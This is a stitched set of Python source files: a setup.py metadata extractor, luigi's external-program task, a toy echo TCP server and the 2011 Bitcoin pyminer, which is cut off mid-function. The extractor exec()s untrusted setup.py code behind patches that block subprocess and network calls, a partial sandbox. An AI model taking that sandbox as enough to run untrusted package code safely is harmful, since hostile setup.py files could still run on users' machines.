"""Attempt a set of executions to obtain metadata from the setup.py without having to build
a wheel. First attempt without mocking __import__ at all. This means that projects
which import a package inside of themselves will not succeed, but all other simple
source distributions will. If this fails, allow mocking of __import__ to extract from
tar files and zip files. Imports will trigger files to be extracted and executed. If
this fails, due to true build prerequisites not being satisfied or the mocks being
insufficient, build the wheel and extract the metadata from it.
Args:
source_file (str): The source archive or directory
name (str): The project name. Used if it cannot be determined from the archive
version (str): The version parsed from the filename. Used when setup.py provides no version or a conflicting one
extractor (Extractor): The extractor to use to obtain files from the archive
Returns:
(DistInfo) The resulting distribution metadata
"""
results = None
setattr(THREADLOCAL, "curdir", extractor.fake_root)
def _fake_chdir(new_dir):
if os.path.isabs(new_dir):
dir_test = os.path.relpath(new_dir, extractor.fake_root)
if dir_test != "." and dir_test.startswith("."):
raise ValueError(
"Cannot operate outside of setup dir ({})".format(dir_test)
)
elif new_dir == "..":
new_dir = "/".join(re.split(r"[/\\]", os.getcwd())[:-1])
setattr(THREADLOCAL, "curdir", os.path.abspath(new_dir))
def _fake_getcwd():
return getattr(THREADLOCAL, "curdir")
def _fake_abspath(path):
"""Return the absolute version of a path."""
if not os.path.isabs(path):
if six.PY2 and isinstance(
path, unicode # pylint: disable=undefined-variable
):
cwd = os.getcwdu() # pylint: disable=no-member
else:
cwd = os.getcwd()
path = cwd + "/" + path
return path
# fmt: off
patches = patch(
os, 'chdir', _fake_chdir,
os, 'getcwd', _fake_getcwd,
os, 'getcwdu', _fake_getcwd,
os.path, 'abspath', _fake_abspath,
)
# fmt: on
with patches:
setup_file = find_in_archive(extractor, "setup.py", max_depth=1)
if name == "setuptools":
LOG.debug("Not running setup.py for setuptools")
return None
if setup_file is None:
LOG.warning(
"Could not find a setup.py in %s", os.path.basename(source_file)
)
return None
try:
LOG.info("Parsing setup.py %s", setup_file)
results = _parse_setup_py(name, setup_file, extractor)
except (Exception, RuntimeError, ImportError): # pylint: disable=broad-except
LOG.warning("Failed to parse %s", name, exc_info=True)
if results is None:
results = _build_egg_info(name, extractor, setup_file)
if results is None or (results.name is None and results.version is None):
return None
if results.name is None:
results.name = name
if results.version is None or (version and results.version != version):
LOG.debug(
"Parsed version of %s did not match filename %s", results.version, version
)
results.version = version or utils.parse_version("0.0.0")
if not isinstance(extractor, NonExtractor) and utils.normalize_project_name(
results.name
) != utils.normalize_project_name(name):
LOG.warning("Name coming from setup.py does not match: %s", results.name)
results.name = name
return results
def _run_with_output(cmd, cwd=None, timeout=30.0):
"""Run a subprocess with a timeout and return the output. Similar check_output with a timeout
Args:
cmd (list[str]): Command line parts
cwd (str, optional): Current working directory to use
timeout (float, optional): The timeout to apply. After this timeout is exhausted, the
subprocess will be killed and an exception raised
Returns:
(str) The stdout and stderr of the process as ascii
Raises:
subprocess.CalledProcessError when the returncode is non-zero or the call times out. If the
call times out, the returncode will be set to -1
"""
proc = subprocess.Popen(
cmd,
cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
def shoveler(output, input_file):
for line in iter(lambda: input_file.read(1024), b""):
output.write(line)
stdout = BytesIO()
output_shoveler = threading.Thread(target=shoveler, args=(stdout, proc.stdout))
output_shoveler.start()
# Close the stdin pipe immediately to unhang anything attempting to read from stdin
proc.stdin.close()
start = time.time()
while proc.poll() is None and (time.time() - start) < timeout:
output_shoveler.join(0.25)
result = proc.poll()
if result is None or result != 0:
ex = subprocess.CalledProcessError(result if result is not None else -1, cmd)
try:
proc.terminate()
proc.kill()
proc.wait()
except EnvironmentError:
pass
output_shoveler.join()
ex.output = stdout.getvalue().decode("ascii", "ignore")
raise ex
output_shoveler.join()
return stdout.getvalue().decode("ascii", "ignore")
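# Minimal usage sketch for _run_with_output; the command below is illustrative.
def _run_with_output_example():
    # Runs a short-lived interpreter command with a small timeout. A non-zero
    # exit code or a hang past the timeout raises subprocess.CalledProcessError.
    return _run_with_output([sys.executable, "-c", "print('hello')"], timeout=5.0)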
def _build_wheel(name, source_file):
"""Build a wheel from a downloaded source file and extract metadata from the wheel"""
results = None
LOG.info("Building wheel file for %s", source_file)
temp_wheeldir = tempfile.mkdtemp()
try:
_run_with_output(
[
sys.executable,
"-m",
"pip",
"wheel",
source_file,
"--no-deps",
"--wheel-dir",
temp_wheeldir,
],
timeout=WHEEL_TIMEOUT,
)
wheel_file = os.path.join(temp_wheeldir, os.listdir(temp_wheeldir)[0])
results = _fetch_from_wheel(wheel_file)
except subprocess.CalledProcessError as ex:
LOG.warning(
'Failed to build wheel for %s:\nThe command "%s" produced:\n%s',
name,
subprocess.list2cmdline(ex.cmd),
ex.output,
)
finally:
shutil.rmtree(temp_wheeldir)
return results
# Shim to wrap setup.py invocation with an import of setuptools
# This is what pip does to allow building wheels of older dists
SETUPTOOLS_SHIM = (
"import setuptools, tokenize;"
"__file__=%r;"
"f = getattr(tokenize, 'open', open)(__file__);"
"code = f.read().replace('\\r\\n', '\\n');"
"f.close();"
"exec(compile(code, __file__, 'exec'))"
)
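# Sketch of how the shim is used further below (the path is illustrative):
#   cmd = [sys.executable, "-c", SETUPTOOLS_SHIM % "/tmp/pkg/setup.py", "egg_info"]
# The generated one-liner imports setuptools before exec()ing the given setup.py,
# so distutils-only projects still expose setuptools commands such as egg_info.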
def _build_egg_info(name, extractor, setup_file):
temp_tar = tempfile.mkdtemp()
extractor.extract(temp_tar)
extracted_setup_py = os.path.join(temp_tar, setup_file)
LOG.info("Building egg info for %s", extracted_setup_py)
try:
setup_dir = os.path.dirname(extracted_setup_py)
output = _run_with_output(
[
sys.executable,
"-c",
SETUPTOOLS_SHIM % extracted_setup_py,
"egg_info",
"--egg-base",
setup_dir,
],
cwd=setup_dir,
timeout=EGG_INFO_TIMEOUT,
)
try:
egg_info_dir = [
egg_info
for egg_info in os.listdir(setup_dir)
if egg_info.endswith(".egg-info")
][0]
metadata = pkg_resources.PathMetadata(
setup_dir, os.path.join(setup_dir, egg_info_dir)
)
pkg_dist = PkgResourcesDistInfo(
pkg_resources.Distribution(
setup_dir, project_name=name, metadata=metadata
)
)
return pkg_dist
except IndexError:
LOG.error(
"Failed to build .egg-info %s:\n%s", list(os.listdir(setup_dir)), output
)
except subprocess.CalledProcessError as ex:
LOG.warning(
'Failed to build egg-info for %s:\nThe command "%s" produced:\n%s',
name,
subprocess.list2cmdline(ex.cmd),
ex.output,
)
try:
return _build_wheel(name, os.path.dirname(extracted_setup_py))
finally:
shutil.rmtree(temp_tar)
def parse_req_with_marker(req_str, marker):
return utils.parse_requirement(
req_str + " and {}".format(marker)
if ";" in req_str
else req_str + "; {}".format(marker)
)
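# Example (sketch): parse_req_with_marker('foo>=1.0', 'extra=="bar"') parses
# 'foo>=1.0; extra=="bar"'; if the requirement already carries a marker, e.g.
# 'foo; python_version<"3"', the new marker is AND-ed onto the existing one.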
def setup(
results, *_args, **kwargs
): # pylint: disable=too-many-branches,too-many-locals
# pbr uses a dangerous pattern that only works when you build using setuptools
# d2to1 uses unknown config options in setup.cfg
setup_frameworks = ("pbr", "d2to1", "use_pyscaffold")
for framework in setup_frameworks:
if framework in kwargs:
raise ValueError("Must run egg-info if {} is used".format(framework))
if "setup_requires" in kwargs and (
"pbr" in kwargs["setup_requires"] or "setupmeta" in kwargs["setup_requires"]
):
raise ValueError("Must run egg-info if pbr/setupmeta is in setup_requires")
if os.path.exists("setup.cfg"):
_add_setup_cfg_kwargs(kwargs)
name = kwargs.get("name", None)
version = kwargs.get("version", None)
reqs = kwargs.get("install_requires", [])
extra_reqs = kwargs.get("extras_require", {})
if version is not None:
version = utils.parse_version(str(version))
if isinstance(reqs, str):
reqs = [reqs]
all_reqs = list(utils.parse_requirements(reqs))
for extra, extra_req_strs in extra_reqs.items():
extra = extra.strip()
if not extra:
continue
try:
if isinstance(extra_req_strs, six.string_types):
extra_req_strs = [extra_req_strs]
cur_reqs = utils.parse_requirements(extra_req_strs)
if extra.startswith(":"):
req_with_marker = [
parse_req_with_marker(str(cur_req), extra[1:])
for cur_req in cur_reqs
]
else:
req_with_marker = [
parse_req_with_marker(
str(cur_req), 'extra=="{}"'.format(extra.replace('"', '\\"'))
)
for cur_req in cur_reqs
]
all_reqs.extend(req_with_marker)
except pkg_resources.RequirementParseError as ex:
print(
"Failed to parse extra requirement ({}) "
"from the set:\n{}".format(str(ex), extra_reqs),
file=sys.stderr,
)
raise
if name is not None:
name = name.replace(" ", "-")
results.append(DistInfo(name, version, all_reqs))
# Some projects inspect the setup() result
class FakeResult(object):
def __getattr__(self, item):
return None
return FakeResult()
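# Sketch: for a hypothetical project whose setup.py calls
#   setup(name="demo", version="1.0", install_requires=["six"],
#         extras_require={"test": ["pytest"]})
# the replacement above appends DistInfo("demo", <parsed 1.0>,
# [six, pytest; extra=="test"]) to `results` instead of building anything.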
def _get_include():
return ""
class FakeNumpyModule(ModuleType):
"""A module simulating numpy"""
def __init__(self, name):
ModuleType.__init__( # pylint: disable=non-parent-init-called,no-member
self, name
)
self.__version__ = "2.16.0"
self.get_include = _get_include
class FakeModule(ModuleType):
"""A module simulating cython"""
def __init__(self, name):
ModuleType.__init__( # pylint: disable=non-parent-init-called,no-member
self, name
)
def __call__(self, *args, **kwargs):
return FakeModule("")
def __iter__(self):
return iter([])
def __getattr__(self, item):
if item == "__path__":
return []
if item == "setup":
return setuptools.setup
return FakeModule(item)
def _add_setup_cfg_kwargs(kwargs):
LOG.info("Parsing from setup.cfg")
parser = configparser.ConfigParser()
parser.read("setup.cfg")
install_requires = kwargs.get("install_requires", [])
if parser.has_option("options", "install_requires"):
install_requires.extend(parser.get("options", "install_requires").split("\n"))
kwargs["install_requires"] = install_requires
extras_require = kwargs.get("extras_require", {})
if parser.has_section("options.extras_require"):
for extra, req_str in parser.items("options.extras_require"):
extras_require[extra] = req_str.split("\n")
kwargs["extras_require"] = extras_require
if parser.has_option("metadata", "name"):
kwargs["name"] = parser.get("metadata", "name")
if parser.has_option("metadata", "version"):
kwargs["version"] = parser.get("metadata", "version")
def remove_encoding_lines(contents):
lines = contents.split("\n")
lines = [
line
for line in lines
if not (
line.startswith("#")
and ("-*- coding" in line or "-*- encoding" in line or "encoding:" in line)
)
]
return "\n".join(lines)
def import_contents(modname, filename, contents):
module = imp.new_module(modname)
if filename.endswith("__init__.py"):
setattr(module, "__path__", [os.path.dirname(filename)])
setattr(module, "__name__", modname)
setattr(module, "__file__", filename)
sys.modules[modname] = module
contents = remove_encoding_lines(contents)
exec(contents, module.__dict__) # pylint: disable=exec-used
return module
def _parse_setup_py(
name, setup_file, extractor
): # pylint: disable=too-many-locals,too-many-statements
# pylint: disable=bad-option-value,no-name-in-module,no-member,import-outside-toplevel,too-many-branches
# Capture warnings.warn, which is sometimes used in setup.py files
logging.captureWarnings(True)
results = []
setup_with_results = functools.partial(setup, results)
import os.path # pylint: disable=redefined-outer-name,reimported
# Make sure __file__ contains only os.sep separators
spy_globals = {
"__file__": os.path.join(extractor.fake_root, setup_file).replace("/", os.sep),
"__name__": "__main__",
"setup": setup_with_results,
}
# pylint: disable=unused-import,unused-variable
import codecs
import distutils.core
import fileinput
import multiprocessing
import requests
try:
import importlib.util
import urllib.request
except ImportError:
pass
if "numpy" not in sys.modules:
sys.modules["numpy"] = FakeNumpyModule("numpy")
sys.modules["numpy.distutils"] = FakeModule("distutils")
sys.modules["numpy.distutils.core"] = FakeModule("core")
sys.modules["numpy.distutils.misc_util"] = FakeModule("misc_util")
sys.modules["numpy.distutils.system_info"] = FakeModule("system_info")
def _fake_exists(path):
return extractor.exists(path)
def _fake_rename(name, new_name):
extractor.add_rename(name, new_name)
def _fake_execfile(path):
exec(extractor.contents(path), spy_globals, spy_globals)
def _fake_file_input(path, **_kwargs):
return open(path, "r")
old_cythonize = None
try:
import Cython.Build # type: ignore
old_cythonize = Cython.Build.cythonize
Cython.Build.cythonize = lambda *args, **kwargs: ""
except ImportError:
sys.modules["Cython"] = FakeModule("Cython")
sys.modules["Cython.Build"] = FakeModule("Build")
sys.modules["Cython.Distutils"] = FakeModule("Distutils")
sys.modules["Cython.Compiler"] = FakeModule("Compiler")
sys.modules["Cython.Compiler.Main"] = FakeModule("Main")
def os_error_call(*args, **kwargs):
raise OSError("Popen not permitted: {} {}".format(args, kwargs))
class FakePopen(object):
def __init__(self, *args, **kwargs):
os_error_call(*args, **kwargs)
def io_error_call(*args, **kwargs):
raise IOError("Network and I/O calls not permitted: {} {}".format(args, kwargs))
setup_dir = os.path.dirname(setup_file)
abs_setupdir = os.path.abspath(setup_dir)
class FakeSpec(object): # pylint: disable=too-many-instance-attributes
class Loader(object):
def exec_module(self, module):
pass
def __init__(self, modname, path):
self.loader = FakeSpec.Loader()
self.name = modname
self.path = path
self.submodule_search_locations = None
self.has_location = True
self.origin = path
self.cached = False
self.parent = None
self.contents = extractor.contents(path)
# pylint: disable=unused-argument
def fake_load_source(modname, filename, filehandle=None):
return import_contents(modname, filename, extractor.contents(filename))
def fake_spec_from_file_location(modname, path, submodule_search_locations=None):
return FakeSpec(modname, path)
def fake_module_from_spec(spec):
return import_contents(spec.name, spec.path, spec.contents)
spec_from_file_location_patch = begin_patch(
"importlib.util", "spec_from_file_location", fake_spec_from_file_location
)
module_from_spec_patch = begin_patch(
"importlib.util", "module_from_spec", fake_module_from_spec
)
load_source_patch = begin_patch(imp, "load_source", fake_load_source)
class ArchiveMetaHook(object):
def __init__(self):
self.mod_mapping = {}
def find_module(self, full_module, path=None):
path_name = full_module.replace(".", "/")
dirs_to_search = [abs_setupdir] + (path if path is not None else [])
for sys_path in sys.path:
if extractor.contains_path(sys_path):
dirs_to_search.append(sys_path)
for dir_to_search in dirs_to_search:
for archive_path in (
os.path.join(dir_to_search, path_name) + ".py",
os.path.join(dir_to_search, path_name, "__init__.py"),
):
if extractor.exists(archive_path):
self.mod_mapping[full_module] = archive_path
return self
return None
def load_module(self, fullname):
LOG.debug("Importing module %s from archive", fullname)
filename = self.mod_mapping[fullname]
code = extractor.contents(filename)
ispkg = filename.endswith("__init__.py")
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = filename
mod.__loader__ = self
if ispkg:
mod.__path__ = []
mod.__package__ = fullname
else:
mod.__package__ = fullname.rpartition(".")[0]
exec(code, mod.__dict__)
return mod
meta_hook = ArchiveMetaHook()
sys.meta_path.append(meta_hook)
fake_stdin = StringIO()
def _fake_find_packages(*args, **kwargs):
return []
# fmt: off
patches = patch(
sys, 'stderr', StringIO(),
sys, 'stdout', StringIO(),
sys, 'stdin', fake_stdin,
os, '_exit', sys.exit,
os, 'symlink', lambda *_: None,
'builtins', 'open', extractor.open,
'__builtin__', 'open', extractor.open,
'__builtin__', 'execfile', _fake_execfile,
subprocess, 'check_call', os_error_call,
subprocess, 'check_output', os_error_call,
subprocess, 'Popen', FakePopen,
multiprocessing, 'Pool', os_error_call,
multiprocessing, 'Process', os_error_call,
'urllib.request', 'urlretrieve', io_error_call,
requests, 'Session', io_error_call,
requests, 'get', io_error_call,
requests, 'post', io_error_call,
os, 'listdir', lambda path: [],
os.path, 'exists', _fake_exists,
os.path, 'isfile', _fake_exists,
os, 'rename', _fake_rename,
io, 'open', extractor.open,
codecs, 'open', extractor.open,
setuptools, 'setup', setup_with_results,
distutils.core, 'setup', setup_with_results,
fileinput, 'input', _fake_file_input,
setuptools, 'find_packages', _fake_find_packages,
sys, 'argv', ['setup.py', 'egg_info'])
# fmt: on
with patches:
try:
sys.path.insert(0, abs_setupdir)
if setup_dir:
os.chdir(abs_setupdir)
contents = extractor.contents(os.path.basename(setup_file))
if six.PY2:
contents = remove_encoding_lines(contents)
contents = contents.replace("print ", "").replace(
"print(", "(lambda *a, **kw: None)("
)
exec(contents, spy_globals, spy_globals)
except SystemExit:
LOG.warning("setup.py raised SystemExit")
finally:
if old_cythonize is not None:
Cython.Build.cythonize = old_cythonize
if abs_setupdir in sys.path:
sys.path.remove(abs_setupdir)
end_patch(load_source_patch)
end_patch(spec_from_file_location_patch)
end_patch(module_from_spec_patch)
sys.meta_path.remove(meta_hook)
for module_name in list(sys.modules.keys()):
try:
module = sys.modules[module_name]
except KeyError:
module = None
if module is None:
continue
if isinstance(module, (FakeModule, FakeNumpyModule)):
del sys.modules[module_name]
elif hasattr(module, "__file__") and module.__file__:
module_file = module.__file__
if hasattr(sys, "real_prefix"):
sys_prefix = sys.real_prefix
elif hasattr(sys, "base_prefix"):
sys_prefix = sys.base_prefix
else:
sys_prefix = sys.prefix
if (
not module_file.startswith(sys_prefix)
and not module_file.startswith(sys.prefix)
and extractor.contains_path(module.__file__)
):
del sys.modules[module_name]
if not results:
raise ValueError(
"Distutils/setuptools setup() was not ever "
'called on "{}". Is this a valid project?'.format(name)
)
result = results[0]
if result is None or (result.name is None and result.version is None):
raise ValueError(
"Failed to fetch any metadata from setup() call. Is this numpy?"
)
return result
|
external_program.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2016 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Template tasks for running external programs as luigi tasks.
This module is primarily intended for when you need to call a single external
program or shell script, and it's enough to specify program arguments and
environment variables.
If you need to run multiple commands, chain them together or pipe output
from one command to the next, you're probably better off using something like
`plumbum`_, and wrapping plumbum commands in normal luigi
:py:class:`~luigi.task.Task` s.
.. _plumbum: https://plumbum.readthedocs.io/
"""
import logging
import os
import re
import signal
import subprocess
import sys
import tempfile
from contextlib import contextmanager
from multiprocessing import Process
from time import sleep
import luigi
from luigi.parameter import ParameterVisibility
logger = logging.getLogger('luigi-interface')
class ExternalProgramTask(luigi.Task):
"""
Template task for running an external program in a subprocess
The program is run using :py:class:`subprocess.Popen`, with ``args`` passed
as a list, generated by :py:meth:`program_args` (where the first element should
be the executable). See :py:class:`subprocess.Popen` for details.
    You must override :py:meth:`program_args` to specify the arguments you want,
and you can optionally override :py:meth:`program_environment` if you want to
control the environment variables (see :py:class:`ExternalPythonProgramTask`
for an example).
By default, the output (stdout and stderr) of the run external program
is being captured and displayed after the execution has ended. This
behaviour can be overridden by passing ``--capture-output False``
"""
capture_output = luigi.BoolParameter(default=True, significant=False, positional=False)
stream_for_searching_tracking_url = luigi.parameter.ChoiceParameter(
var_type=str, choices=['none', 'stdout', 'stderr'], default='none',
significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
description="Stream for searching tracking URL")
"""
Used for defining which stream should be tracked for URL, may be set to 'stdout', 'stderr' or 'none'.
Default value is 'none', so URL tracking is not performed.
"""
tracking_url_pattern = luigi.OptionalParameter(
default=None, significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
description="Regex pattern used for searching URL in the logs of the external program")
"""
Regex pattern used for searching URL in the logs of the external program.
If a log line matches the regex, the first group in the matching is set as the tracking URL
for the job in the web UI. Example: 'Job UI is here: (https?://.*)'.
Default value is None, so URL tracking is not performed.
"""
def program_args(self):
"""
Override this method to map your task parameters to the program arguments
:return: list to pass as ``args`` to :py:class:`subprocess.Popen`
"""
raise NotImplementedError
def program_environment(self):
"""
Override this method to control environment variables for the program
:return: dict mapping environment variable names to values
"""
env = os.environ.copy()
return env
@property
def always_log_stderr(self):
"""
When True, stderr will be logged even if program execution succeeded
Override to False to log stderr only when program execution fails.
"""
return True
def _clean_output_file(self, file_object):
file_object.seek(0)
return ''.join(map(lambda s: s.decode('utf-8'), file_object.readlines()))
def build_tracking_url(self, logs_output):
"""
This method is intended for transforming pattern match in logs to an URL
:param logs_output: Found match of `self.tracking_url_pattern`
:return: a tracking URL for the task
"""
return logs_output
def run(self):
args = list(map(str, self.program_args()))
logger.info('Running command: %s', ' '.join(args))
env = self.program_environment()
kwargs = {'env': env}
tmp_stdout, tmp_stderr = None, None
if self.capture_output:
tmp_stdout, tmp_stderr = tempfile.TemporaryFile(), tempfile.TemporaryFile()
kwargs.update({'stdout': tmp_stdout, 'stderr': tmp_stderr})
try:
if self.stream_for_searching_tracking_url != 'none' and self.tracking_url_pattern is not None:
with self._proc_with_tracking_url_context(proc_args=args, proc_kwargs=kwargs) as proc:
proc.wait()
else:
proc = subprocess.Popen(args, **kwargs)
with ExternalProgramRunContext(proc):
proc.wait()
success = proc.returncode == 0
if self.capture_output:
stdout = self._clean_output_file(tmp_stdout)
stderr = self._clean_output_file(tmp_stderr)
if stdout:
logger.info('Program stdout:\n{}'.format(stdout))
if stderr:
if self.always_log_stderr or not success:
logger.info('Program stderr:\n{}'.format(stderr))
else:
stdout, stderr = None, None
if not success:
raise ExternalProgramRunError(
'Program failed with return code={}:'.format(proc.returncode),
args, env=env, stdout=stdout, stderr=stderr)
finally:
if self.capture_output:
tmp_stderr.close()
tmp_stdout.close()
@contextmanager
def _proc_with_tracking_url_context(self, proc_args, proc_kwargs):
time_to_sleep = 0.5
file_to_write = proc_kwargs.get(self.stream_for_searching_tracking_url)
proc_kwargs.update({self.stream_for_searching_tracking_url: subprocess.PIPE})
main_proc = subprocess.Popen(proc_args, **proc_kwargs)
pipe_to_read = main_proc.stderr if self.stream_for_searching_tracking_url == 'stderr' else main_proc.stdout
def _track_url_by_pattern():
"""
Scans the pipe looking for a passed pattern, if the pattern is found, `set_tracking_url` callback is sent.
If tmp_stdout is passed, also appends lines to this file.
"""
pattern = re.compile(self.tracking_url_pattern)
for new_line in iter(pipe_to_read.readline, ''):
if new_line:
if file_to_write:
file_to_write.write(new_line)
match = re.search(pattern, new_line.decode('utf-8'))
if match:
self.set_tracking_url(
self.build_tracking_url(match.group(1))
)
else:
file_to_write.flush()
sleep(time_to_sleep)
track_proc = Process(target=_track_url_by_pattern)
try:
track_proc.start()
with ExternalProgramRunContext(main_proc):
yield main_proc
finally:
# need to wait a bit to let the subprocess read the last lines
track_proc.join(time_to_sleep * 2)
if track_proc.is_alive():
track_proc.terminate()
pipe_to_read.close()
class ExternalProgramRunContext:
def __init__(self, proc):
self.proc = proc
def __enter__(self):
self.__old_signal = signal.getsignal(signal.SIGTERM)
signal.signal(signal.SIGTERM, self.kill_job)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is KeyboardInterrupt:
self.kill_job()
signal.signal(signal.SIGTERM, self.__old_signal)
def kill_job(self, captured_signal=None, stack_frame=None):
self.proc.kill()
if captured_signal is not None:
# adding 128 gives the exit code corresponding to a signal
sys.exit(128 + captured_signal)
class ExternalProgramRunError(RuntimeError):
def __init__(self, message, args, env=None, stdout=None, stderr=None):
super(ExternalProgramRunError, self).__init__(message, args, env, stdout, stderr)
self.message = message
self.args = args
self.env = env
self.out = stdout
self.err = stderr
def __str__(self):
info = self.message
info += '\nCOMMAND: {}'.format(' '.join(self.args))
info += '\nSTDOUT: {}'.format(self.out or '[empty]')
info += '\nSTDERR: {}'.format(self.err or '[empty]')
env_string = None
if self.env:
env_string = ' '.join(['='.join([k, '\'{}\''.format(v)]) for k, v in self.env.items()])
info += '\nENVIRONMENT: {}'.format(env_string or '[empty]')
# reset terminal color in case the ENVIRONMENT changes colors
info += '\033[m'
return info
class ExternalPythonProgramTask(ExternalProgramTask):
"""
Template task for running an external Python program in a subprocess
Simple extension of :py:class:`ExternalProgramTask`, adding two
:py:class:`luigi.parameter.Parameter` s for setting a virtualenv and for
extending the ``PYTHONPATH``.
"""
virtualenv = luigi.Parameter(
default=None,
positional=False,
description='path to the virtualenv directory to use. It should point to '
'the directory containing the ``bin/activate`` file used for '
'enabling the virtualenv.')
extra_pythonpath = luigi.Parameter(
default=None,
positional=False,
description='extend the search path for modules by prepending this '
'value to the ``PYTHONPATH`` environment variable.')
def program_environment(self):
env = super(ExternalPythonProgramTask, self).program_environment()
if self.extra_pythonpath:
pythonpath = ':'.join([self.extra_pythonpath, env.get('PYTHONPATH', '')])
env.update({'PYTHONPATH': pythonpath})
if self.virtualenv:
# Make the same changes to the env that a normal venv/bin/activate script would
path = ':'.join(['{}/bin'.format(self.virtualenv), env.get('PATH', '')])
env.update({
'PATH': path,
'VIRTUAL_ENV': self.virtualenv
})
# remove PYTHONHOME env variable, if it exists
env.pop('PYTHONHOME', None)
return env
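# --- Hedged usage sketch (not part of luigi) ---------------------------------
# A minimal concrete subclass of ExternalProgramTask. The task name, command
# and output path are assumptions made for this example.
class ExampleEchoTask(ExternalProgramTask):
    """Writes "hello" to ``output_path`` by shelling out through the template task above."""

    output_path = luigi.Parameter(default='/tmp/external-program-example.txt')

    def output(self):
        return luigi.LocalTarget(self.output_path)

    def program_args(self):
        # The first element is the executable, the rest are its arguments.
        return ['bash', '-c', 'echo hello > {}'.format(self.output_path)]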
|
serwerTCP.py
|
#!/usr/bin/python
#coding=utf-8
print "Content-type:text/html\r\n\r\n"
print '<html>'
print '<head>'
print '<title>Socket kurcze !</title>'
print '</head>'
print '<body>'
print '<h2>Hello World! This is my first CGI program</h2>'
print '</body>'
print '</html>'
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from os import curdir, sep
import os
import subprocess
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 8081
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Nasłuchiwanie na porcie %s:%d" % (bind_ip,bind_port)
# wątek do obsługi klienta
def handle_client(client_socket):
    # print the information sent by the client
request = client_socket.recv(1024)
print "[*] Odebrano: %s" % request
# wysyła pakiet z powrotem
client_socket.send("ACK!")
client_socket.close()
while True:
client,addr = server.accept()
print "[*] Przyjęto połączenie od: %s:%d" % (addr[0],addr[1])
# utworzenie wątku klienta do obsługi przychodzących danych
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
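# --- Hedged sketch (illustrative, not part of the server above) --------------
# A matching client, meant to be run from a separate process while the accept
# loop above is active. Host, port and payload are assumptions for the example;
# the server answers "ACK!" to whatever it receives.
def send_once(host="127.0.0.1", port=8081, payload="hello"):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    client.send(payload)          # the server prints whatever it receives
    response = client.recv(4096)  # expect "ACK!" back
    client.close()
    return response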
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
